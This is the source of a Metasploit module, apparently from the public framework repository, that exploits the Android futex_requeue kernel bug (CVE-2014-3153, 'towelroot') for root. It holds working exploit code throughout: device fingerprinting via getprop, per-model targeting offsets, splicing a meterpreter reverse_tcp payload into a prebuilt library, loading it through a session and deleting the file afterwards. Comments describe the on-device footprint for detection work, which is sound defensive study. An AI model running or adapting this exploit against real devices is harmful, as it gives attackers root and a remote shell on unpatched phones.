Path: blob/master/modules/exploits/android/local/futex_requeue.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege-escalation module for CVE-2014-3153 (futex_requeue, "towelroot").
#
# The kernel-facing logic is NOT in this file: it lives in a prebuilt shared
# object shipped with the framework (data/exploits/CVE-2014-3153.so). This
# module only splices an encoded payload and a per-device configuration
# record into that binary, writes it to the device and asks the meterpreter
# session to load it.
#
# Footprint on the device, as visible from this file (useful when writing
# detections or reconstructing a timeline):
#   * `getprop` invocations for ro.build.version.release (#check) and for
#     ro.build.product / ro.build.fingerprint (#exploit, automatic target only),
#   * a file with a random 5-letter lowercase name written to the session's
#     current working directory and deleted immediately after it is loaded,
#   * a library load through the meterpreter session (core_loadlib is listed
#     under 'Compat').
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common
  # Framework mixin that runs #check ahead of #exploit.
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata.
  #
  # Each non-automatic entry in 'Targets' carries the four fields that
  # #exploit packs into the 16-byte config record: new_samsung, iovstack,
  # offset and force_remove. Their meaning is defined by the prebuilt .so,
  # not by this file. #exploit selects targets by POSITION (targets[1..4]),
  # so the order of this array must not change without updating #exploit.
  #
  # 'Compat' lists the meterpreter commands #exploit depends on: core_loadlib
  # (load_library), stdapi_fs_delete_file (rm) and stdapi_fs_getwd (getwd).
  #
  # @param info [Hash] module info merged by Msf::Exploit::Local
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit",
          'Description' => %q{
            This module exploits a bug in futex_requeue in the Linux kernel, using
            similar techniques employed by the towelroot exploit. Any Android device
            with a kernel built before June 2014 is likely to be vulnerable.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Pinkie Pie', # discovery
            'geohot', # towelroot
            'timwr' # metasploit module
          ],
          'References' => [
            [ 'CVE', '2014-3153' ],
            [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],
            [ 'URL', 'http://web.archive.org/web/20160912014145/http://blog.nativeflow.com:80/the-futex-vulnerability' ],
          ],
          'DisclosureDate' => '2014-05-03',
          'SessionTypes' => [ 'meterpreter' ],
          'Platform' => [ 'android', 'linux' ],
          # 'Space' is also the size of the payload placeholder that #exploit
          # searches for in the prebuilt .so (4 x \x90 followed by Space-4 zeros).
          'Payload' => { 'Space' => 2048 },
          'DefaultOptions' => {
            # Seconds the framework waits for a session after #exploit returns;
            # #exploit itself only prints this value.
            'WfsDelay' => 300,
            'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
          },
          'Notes' => {
            'Stability' => [CRASH_SAFE],
            'SideEffects' => [],
            'Reliability' => [],
            'AKA' => ['towelroot']
          },
          'DefaultTarget' => 0,
          'Targets' => [
            # targets[0]: automatic targeting keyed on `getprop ro.build.product`
            # (see #exploit); the 'auto' flag is what #exploit tests for.
            ['Automatic Targeting', { 'auto' => true }],

            # targets[1]: the default setting, Nexus 4, 5, 7, etc.
            # Also the fallback when automatic targeting does not recognise the product.
            [
              'Default',
              {
                'new_samsung' => false,
                'iovstack' => 2,
                'offset' => 0,
                'force_remove' => false
              }
            ],

            # targets[2]: Samsung devices, S3, S4, S5, etc.
            [
              'New Samsung',
              {
                'new_samsung' => true,
                'iovstack' => 2,
                'offset' => 7380,
                'force_remove' => true
              }
            ],

            # targets[3]: older Samsung devices, e.g. the Note 2
            [
              'Old Samsung',
              {
                'new_samsung' => false,
                'iovstack' => 1,
                'offset' => 0,
                'force_remove' => true
              }
            ],

            # targets[4]: Samsung Galaxy Grand, etc.
            [
              'Samsung Grand',
              {
                'new_samsung' => false,
                'iovstack' => 5,
                'offset' => 0,
                'force_remove' => true
              }
            ],
          ],
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                core_loadlib
                stdapi_fs_delete_file
                stdapi_fs_getwd
              ]
            }
          }
        }
      )
    )
  end

  # Coarse vulnerability heuristic based only on the advertised Android
  # release string (`getprop ro.build.version.release`): anything that
  # compares below 4.5.0 is reported as CheckCode::Appears.
  #
  # This is a version-string comparison, not a kernel probe. It cannot see
  # whether the futex fix was backported into an older release (false
  # positive), nor whether a newer release still ships an unpatched vendor
  # kernel (false negative); hence "Appears" rather than "Vulnerable".
  #
  # @return [Msf::Exploit::CheckCode] CheckCode::Safe when the release is
  #   4.5.0 or newer, CheckCode::Appears otherwise
  def check
    os = cmd_exec('getprop ro.build.version.release')
    unless Rex::Version.new(os) < Rex::Version.new('4.5.0')
      vprint_error "Android version #{os} does not appear to be vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Android version #{os} appears to be vulnerable"

    CheckCode::Appears
  end

  # Builds the patched library and hands it to the session.
  #
  # Steps, in order:
  #   1. pick a target -- by `ro.build.product` when 'Automatic Targeting' is
  #      selected, otherwise the one the user chose;
  #   2. read the prebuilt .so and splice the encoded payload over its
  #      placeholder;
  #   3. splice the target's packed config record over the 'c0nfig' placeholder;
  #   4. write the result to the session's working directory, load it, delete it.
  #
  # Both splices use String#gsub! and ignore its return value (nil when the
  # placeholder is not present), so a change to the placeholders in
  # CVE-2014-3153.so would not be noticed here; the module would load an
  # unpatched library instead of failing at the substitution.
  #
  # @raise [ArgumentError] ("negative argument") from `"\x90" * n` when the
  #   encoded payload is shorter than payload_space. NOTE(review): this
  #   presumably relies on the framework padding the encoded payload up to
  #   'Space' -- confirm before touching the 'Payload' metadata.
  def exploit
    # Only the 'Automatic Targeting' entry carries the 'auto' key; for every
    # other target this lookup is nil and the user's choice is used as-is.
    if target['auto']
      product = cmd_exec('getprop ro.build.product')
      fingerprint = cmd_exec('getprop ro.build.fingerprint')
      print_status("Found device: #{product}")
      print_status("Fingerprint: #{fingerprint}")

      # The indices below are positions in the 'Targets' array of #initialize.
      if [
        'mako',
        'm7',
        'hammerhead',
        'grouper',
        'Y530-U00',
        'G6-U10',
        'g2',
        'w7n',
        'D2303',
        'cancro',
      ].include? product
        my_target = targets[1] # Default
      elsif [
        'klte', # Samsung Galaxy S5
        'jflte', # Samsung Galaxy S4
        'd2vzw' # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
      ].include? product
        my_target = targets[2] # New Samsung
      elsif [
        't03g',
        'm0',
      ].include? product
        my_target = targets[3] # Old Samsung
      elsif [
        'baffinlite',
        'Vodafone_785',
      ].include? product
        my_target = targets[4] # Samsung Grand
      else
        # Unknown product: fall back to the Default config rather than abort.
        print_status("Could not automatically target #{product}")
        my_target = targets[1] # Default
      end
    else
      my_target = target
    end

    print_status("Using target: #{my_target.name}")

    # The prebuilt library is read in binary mode; it is never executed locally.
    local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-3153.so')
    exploit_data = File.read(local_file, mode: 'rb')

    # Substitute the exploit shellcode with our own.
    # Placeholder: 4 x \x90 followed by (Space - 4) zero bytes, i.e. exactly
    # payload_space bytes. The replacement is the encoded payload plus
    # (payload length - Space) \x90 bytes; that count is only non-negative when
    # the encoded payload is at least payload_space long (see @raise above).
    space = payload_space
    payload_encoded = payload.encoded
    exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))

    # Apply the target config.
    # 'I4' packs four unsigned ints in the HOST's native size and byte order
    # (4 bytes each on the usual hosts, 16 bytes total -- the length of the
    # 'c0nfig' + 10 x \x00 placeholder). -1 therefore becomes 0xFFFFFFFF, and
    # the record is only correct when the host's byte order matches the
    # device's. .to_i tolerates a missing key (nil -> 0).
    offsets = my_target.opts
    config_buf = [
      offsets['new_samsung'] ? -1 : 0,
      offsets['iovstack'].to_i,
      offsets['offset'].to_i,
      offsets['force_remove'] ? -1 : 0,
    ].pack('I4')
    exploit_data.gsub!('c0nfig' + "\x00" * 10, config_buf)

    # The patched copy is written to the session's current working directory
    # under a random 5-letter lowercase name; this is the on-disk artefact.
    workingdir = session.fs.dir.getwd
    remote_file = "#{workingdir}/#{Rex::Text.rand_text_alpha_lower(5)}"
    write_file(remote_file, exploit_data)

    print_status("Loading exploit library #{remote_file}")
    # 'UploadLibrary' => false: the patched file is already on the device, so
    # the session is presumably asked to load remote_file rather than to
    # re-upload the (unpatched) local_file -- verify against the core_loadlib
    # implementation if this is changed.
    session.core.load_library(
      'LibraryFilePath' => local_file,
      'TargetFilePath' => remote_file,
      'UploadLibrary' => false,
      'Extension' => false,
      'SaveToDisk' => false
    )
    # The file is removed right after loading, so it is short-lived on disk.
    print_status("Loaded library #{remote_file}, deleting")
    session.fs.file.rm(remote_file)
    # Informational only: the wait for the new session is done by the
    # framework (WfsDelay), not by this method.
    print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
  end
end